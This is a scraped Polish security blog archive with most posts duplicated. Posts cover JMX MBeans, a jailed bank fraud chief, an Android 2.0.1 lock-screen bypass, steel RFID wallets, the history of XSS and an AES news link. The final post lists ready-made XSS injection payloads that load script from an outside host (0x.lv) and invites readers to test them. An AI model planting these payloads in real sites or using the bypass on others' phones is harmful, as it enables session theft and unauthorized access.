What are MBeans JavaBeans and JMX
What are MBeans?
MBeans Objects are type of JavaBean, created (mostly) with the Dependency Injection
12 lut 2014
What are MBeans JavaBeans and JMX
MBeans Objects are type of JavaBean, created (mostly) with the Dependency Injection
29 sty 2010
I jak tu (nie) ufac
By Rob Preece Crime Correspondent
"A FORMER anti-fraud boss at the Yorkshire-based bank First Direct has been jailed for stealing from customers' accounts to fund his alcoholism and cocaine addiction.
In his £65,000-a-year job as head of fraud operations, Richard Crawford, 41, was trusted with the personal details of account holders whose finances were thought to be most at risk from criminals."
Wiecej na: http://www.yorkshirepost.co.uk/news/Banks-antifraud-boss-jailed-for.6008159.jp
"A FORMER anti-fraud boss at the Yorkshire-based bank First Direct has been jailed for stealing from customers' accounts to fund his alcoholism and cocaine addiction.
In his £65,000-a-year job as head of fraud operations, Richard Crawford, 41, was trusted with the personal details of account holders whose finances were thought to be most at risk from criminals."
Wiecej na: http://www.yorkshirepost.co.uk/news/Banks-antifraud-boss-jailed-for.6008159.jp
12 sty 2010
Niebezpieczny Droid
Zła wiadomość dla użytkowników Droid'a. Android OS ver. 2.0.1, czyli aktualna wersja na której działa Droid, posiada lukę bezpieczeństwa która umożliwia obejście zabezpieczenia blokady ekranu.
Zabezpieczenie polega na połączeniu kropek na ekranie, w taki sposób jaki wcześniej został zdefiniowany przez użytkownika. (iPhone posiada podobną opcję).
Obejście zabezpieczenia jest niezwykle łatwe. Wystarczy zadzwonić na podatny telefon i zamiast odebrać połączenie, wystarczy na zablokowanym ekranie wcisnąć przycisk 'Back'. W efekcie znajdziemy się w menu głównym telefonu. Daje nam to pełen dostęp do telefonu, tj. konto mailowe, odwiedzone strony internetowe, ksiązka adresowa, oraz pozostałe rzeczy zapisane w pamięci telefonu.
Błąd został zgłoszony przez 'The Assurer' (https://theassurer.com/p/756.html), który twierdzi, że podatny jest jedynie Droid z wersją Android 2.0.1.
Oto odpowiedź Google odnośnie w/w sprawy:
“We are aware of the issue and we’re working to deliver a fix to Motorola Droids shortly.”
(Jesteśmy świadomi błędu. W najbliższym czasie udostępnimy łatkę dla telefonów Motorola Droid.)
Android nie jest pierwszym smartphon'em z tego typu błędem. sierpniu 2008 r., podobny błąd występował w telefonach iPhone.
http://www.techcrunch.com/2010/01/11/verizon-droid-security-bug
Zabezpieczenie polega na połączeniu kropek na ekranie, w taki sposób jaki wcześniej został zdefiniowany przez użytkownika. (iPhone posiada podobną opcję).
Obejście zabezpieczenia jest niezwykle łatwe. Wystarczy zadzwonić na podatny telefon i zamiast odebrać połączenie, wystarczy na zablokowanym ekranie wcisnąć przycisk 'Back'. W efekcie znajdziemy się w menu głównym telefonu. Daje nam to pełen dostęp do telefonu, tj. konto mailowe, odwiedzone strony internetowe, ksiązka adresowa, oraz pozostałe rzeczy zapisane w pamięci telefonu.
Błąd został zgłoszony przez 'The Assurer' (https://theassurer.com/p/756.html), który twierdzi, że podatny jest jedynie Droid z wersją Android 2.0.1.
Oto odpowiedź Google odnośnie w/w sprawy:
“We are aware of the issue and we’re working to deliver a fix to Motorola Droids shortly.”
(Jesteśmy świadomi błędu. W najbliższym czasie udostępnimy łatkę dla telefonów Motorola Droid.)
Android nie jest pierwszym smartphon'em z tego typu błędem. sierpniu 2008 r., podobny błąd występował w telefonach iPhone.
http://www.techcrunch.com/2010/01/11/verizon-droid-security-bug
19 gru 2009
Stalowa chrona kart zbliżeniowych
Posiadając, ostatnio często reklamowane przez różne bank, kartę zbliżeniową, jesteśmy narażeni na możliwość zczytania z niej danych.
W jaki sposób możemy się zabezpieczyć przed złodziejami? Z pomocą przychodzi portfel 'utkany ze stali'.
Według opisu producenta, posiadając taki portfel, możemy się odprężyć i być spokojni, że nasze dane pozostaną przy nas.
Portfel utkany jest z ponad 20.000 super cienkich nici wykonanych z nierdzewnej stali. Gęstość konstrukcji tworzy pancerz naokoło naszych kart. Dzięki niej, nasze karty, są bezpieczniejsze niż do tej pory.
Metodologia szycia przypomina nam model klatki Faradaya - pomieszczenia mającego na celu zablokowanie zewnętrznych pól elektrycznych. Analogicznie wykonany portfel, zapewnia zabezpieczenie jego zawartości.
Oprócz utrudnienia zczytywania danych dla 'nowoczesnych' kieszonkowców, stalowy portfel zabezpiecza karty również przed kradzieżą metodę brute-force ;) (metal zamiast materiału).
Portfel jest w stanie pomieścić sześć kart, posiada dwa sloty wewnętrzne i 'spinkę' na banknoty.
W tej chwili dostępne są dwa modele - "Smooth" oraz "Engine Turned" - w cenie $79.95(£49 /€ 55) ~ ok. 232 PLN
Więcej o portfelu: http://www.herringtoncatalog.com/es675.html
W jaki sposób możemy się zabezpieczyć przed złodziejami? Z pomocą przychodzi portfel 'utkany ze stali'.
Według opisu producenta, posiadając taki portfel, możemy się odprężyć i być spokojni, że nasze dane pozostaną przy nas.
Portfel utkany jest z ponad 20.000 super cienkich nici wykonanych z nierdzewnej stali. Gęstość konstrukcji tworzy pancerz naokoło naszych kart. Dzięki niej, nasze karty, są bezpieczniejsze niż do tej pory.
Metodologia szycia przypomina nam model klatki Faradaya - pomieszczenia mającego na celu zablokowanie zewnętrznych pól elektrycznych. Analogicznie wykonany portfel, zapewnia zabezpieczenie jego zawartości.
Oprócz utrudnienia zczytywania danych dla 'nowoczesnych' kieszonkowców, stalowy portfel zabezpiecza karty również przed kradzieżą metodę brute-force ;) (metal zamiast materiału).
Portfel jest w stanie pomieścić sześć kart, posiada dwa sloty wewnętrzne i 'spinkę' na banknoty.
W tej chwili dostępne są dwa modele - "Smooth" oraz "Engine Turned" - w cenie $79.95(£49 /€ 55) ~ ok. 232 PLN
Więcej o portfelu: http://www.herringtoncatalog.com/es675.html
16 gru 2009
#10 'te #urodziny #xss ! sto lat sto lat :)
16-ego stycznia, 2000, dla małej grupki inżynierów w Microsoft, zostaly zasugerowane nastepujace nazwy:
Następnego dnia uzgodniono nazwę - Cross Site Scripting.
Na początku lutego, wypuszczono dokument (CERT):
http://www.cert.org/advisories/CA-2000-02.html
Według niektórych źródeł, za datę narodzin #XSS uznaje się środek grudnia 1999 (czyli 10 lat temu). Jednak zgodzę się tutaj z radekk, i też uznałbym raczej datę 'advisory release'.
Co się zmieniło przez ten czas? Bardzo wiele :).
Kiedyś #XSS uznawane były za nic nie znaczące, denerwujące błędy umożliwiające wyświetlenie okienka z napisem CZESC.
Wraz z pojawieniem sie 'web 2.0' sytuacja ta zmieniła się. Powstały potężne społeczności internetowe, zawierające setki tysięcy danych użytkowników. Idealne miejsce do zbierania informacji typu: login, hasło, mail, odrazu stało się głównym celem hackerów, phisherów (chyba wszyscy pamiętamy popularnego Samy (JS.Spacehero). Błędy typu SQL Injection nie były już problemem 'numer jeden' (chociaż nadal są równie niebezpieczne), bo po co dostawać się do wnętrza systemu, skoro można wykorzystać błąd po stronie zalogowanego użytkownika, pobierając jego dane identyfikacyjne (np. dane zawarte w cookie).
XSS rozwijało się w zastraszającym tempie, od prostych skryptów typu alert(document.cookie), aż po wyrafinowane skrypty które można łączyć z innego rodzaju błędami. Jako ciekawostki można polecić:
Cross Domain Search Timing
Sprawdz czy jestes zalogowany/a na google
Łącząc różne techniki ataków (CSRF, XCSS...), można stworzyć naprawdę niebezpieczne skrypty/ robaki, infekujące zarówno web serwisy, jak i komputery użytkowników.
Jak widać, nigdy nie należy nie doceniać nawet najprostszego rodzaju błędów.
3RTHF3QVVPJ2
Unauthorized Site Scripting
Unofficial Site Scripting
URL Parameter Script Insertion
Cross Site Scripting
Synthesized Scripting
Fraudulent Scripting
Następnego dnia uzgodniono nazwę - Cross Site Scripting.
Na początku lutego, wypuszczono dokument (CERT):
http://www.cert.org/advisories/CA-2000-02.html
Według niektórych źródeł, za datę narodzin #XSS uznaje się środek grudnia 1999 (czyli 10 lat temu). Jednak zgodzę się tutaj z radekk, i też uznałbym raczej datę 'advisory release'.
Co się zmieniło przez ten czas? Bardzo wiele :).
Kiedyś #XSS uznawane były za nic nie znaczące, denerwujące błędy umożliwiające wyświetlenie okienka z napisem CZESC.
Wraz z pojawieniem sie 'web 2.0' sytuacja ta zmieniła się. Powstały potężne społeczności internetowe, zawierające setki tysięcy danych użytkowników. Idealne miejsce do zbierania informacji typu: login, hasło, mail, odrazu stało się głównym celem hackerów, phisherów (chyba wszyscy pamiętamy popularnego Samy (JS.Spacehero). Błędy typu SQL Injection nie były już problemem 'numer jeden' (chociaż nadal są równie niebezpieczne), bo po co dostawać się do wnętrza systemu, skoro można wykorzystać błąd po stronie zalogowanego użytkownika, pobierając jego dane identyfikacyjne (np. dane zawarte w cookie).
XSS rozwijało się w zastraszającym tempie, od prostych skryptów typu alert(document.cookie), aż po wyrafinowane skrypty które można łączyć z innego rodzaju błędami. Jako ciekawostki można polecić:
Cross Domain Search Timing
Sprawdz czy jestes zalogowany/a na google
Łącząc różne techniki ataków (CSRF, XCSS...), można stworzyć naprawdę niebezpieczne skrypty/ robaki, infekujące zarówno web serwisy, jak i komputery użytkowników.
Jak widać, nigdy nie należy nie doceniać nawet najprostszego rodzaju błędów.
3RTHF3QVVPJ2
9 gru 2009
(update) do (in)security tygodnia
Nie wiem czemu ale zapodzialo mi się to gdzieś, więc wstawiam teraz:
http://www.heise-online.pl/security/news/item/Nowy-sposob-lamania-szyfru-AES-878754.html Nowy sposób na #łamanie #AES #security #crypto
http://www.heise-online.pl/security/news/item/Nowy-sposob-lamania-szyfru-AES-878754.html Nowy sposób na #łamanie #AES #security #crypto
All in one exploit...s !
Witam. Dzisiaj w moje raczki wpadla super paczka mini tyci exploitow ;)
Otoz pan sirdarckcat przed chwilą opublikował niezły zestaw exploitów all in one.
Oto one:
http://0x.lv/xss.xml XBL+XHTML
http://0x.lv/xss.css (binding/expression/jsuri)
http://0x.lv/xss.swf (getURL)
<script src=//0x.lv> LUB <link rel=stylesheet href=//0x.lv> LUB <img src=//0x.lv> LUB <iframe src=//0x.lv> także: XHR/RFI/etc
Testujcie testujcie :)
http://0x.lv/ all in one BMP+JS+CSS+HTML+HTTP+XHR XSS exploit ;)
Otoz pan sirdarckcat przed chwilą opublikował niezły zestaw exploitów all in one.
Oto one:
http://0x.lv/xss.xml XBL+XHTML
http://0x.lv/xss.css (binding/expression/jsuri)
http://0x.lv/xss.swf (getURL)
<script src=//0x.lv> LUB <link rel=stylesheet href=//0x.lv> LUB <img src=//0x.lv> LUB <iframe src=//0x.lv> także: XHR/RFI/etc
Testujcie testujcie :)
http://0x.lv/ all in one BMP+JS+CSS+HTML+HTTP+XHR XSS exploit ;)
Subskrybuj:
Posty (Atom)
Posty
